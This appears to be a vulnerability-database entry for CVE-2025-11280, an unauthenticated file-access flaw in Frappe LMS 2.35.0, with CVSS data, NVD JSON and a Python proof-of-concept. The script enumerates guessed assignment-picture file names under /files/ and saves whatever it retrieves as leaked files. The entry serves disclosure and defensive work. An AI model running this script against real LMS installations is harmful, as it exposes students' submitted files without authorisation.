Security Vulnerability Report
CVE-2025-11280 CVSS 3.7 LOW

CVE-2025-11280

Published: 2025-10-05 04:15:35
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in Frappe LMS 2.35.0. Impacted is an unknown function of the file /files/ of the component Assignment Picture Handler. This manipulation causes direct request. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitability is considered difficult. The exploit has been published and may be used. It is advisable to upgrade the affected component. The vendor was informed early about a total of four security issues and confirmed that those have been fixed. However, the release notes on GitHub do not mention them.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:* - VULNERABLE
Frappe LMS 2.35.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11280 PoC - Frappe LMS Assignment Picture Handler Direct Request
# Author: 0xHamy
# Reference: https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1
import requests

# Target configuration
TARGET_URL = "https://target-frappe-lms.com"

# The vulnerable endpoint is in the /files/ path
# Assignment pictures are stored with predictable file names


def exploit_direct_request(file_id):
    """
    Exploit the insecure direct request vulnerability in Frappe LMS 2.35.0
    The Assignment Picture Handler does not verify access permissions
    before serving files from the /files/ endpoint.
    """
    # Construct the direct request URL to the assignment picture handler
    url = f"{TARGET_URL}/files/{file_id}"

    # Send the request without authentication
    # No cookies, no tokens, no session required (PR:N)
    response = requests.get(url, verify=False)

    if response.status_code == 200:
        print(f"[+] Successfully accessed file: {file_id}")
        print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
        print(f"[+] Content-Length: {response.headers.get('Content-Length')}")

        # Save the leaked file content
        with open(f"leaked_{file_id.replace('/', '_')}", "wb") as f:
            f.write(response.content)
        return True
    else:
        print(f"[-] Failed to access file: {file_id}, Status: {response.status_code}")
        return False


def enumerate_files():
    """
    Enumerate potential assignment picture file IDs
    File IDs may follow predictable patterns
    """
    # Common patterns for assignment picture file IDs in Frappe LMS
    potential_ids = [
        "assignment_picture_1.jpg",
        "assignment_picture_2.jpg",
        "homework_image_1.png",
        "submission_photo_1.jpeg"
    ]

    for file_id in potential_ids:
        exploit_direct_request(file_id)


if __name__ == "__main__":
    print("[*] CVE-2025-11280 - Frappe LMS Direct Request Exploit")
    print("[*] Targeting Assignment Picture Handler")
    enumerate_files()

# Steps to reproduce:
# 1. Identify a Frappe LMS 2.35.0 instance
# 2. Navigate to the /files/ endpoint
# 3. Request assignment picture files directly without authentication
# 4. Observe that files are returned without access control checks
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11280", "sourceIdentifier": "[email protected]", "published": "2025-10-05T04:15:35.457", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Frappe LMS 2.35.0. Impacted is an unknown function of the file /files/ of the component Assignment Picture Handler. This manipulation causes direct request. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitability is considered difficult. The exploit has been published and may be used. It is advisable to upgrade the affected component. The vendor was informed early about a total of four security issues and confirmed that those have been fixed. However, the release notes on GitHub do not mention them."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4798441-F3FA-420C-B28E-7DB3096A2A2B"}]}]}], "references": [{"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1#steps-to-reproduce", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327014", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327014", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659694", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/0xHamy/beb840a754f50a7ee6500600147a6ac1#steps-to-reproduce", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?submit.659694", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}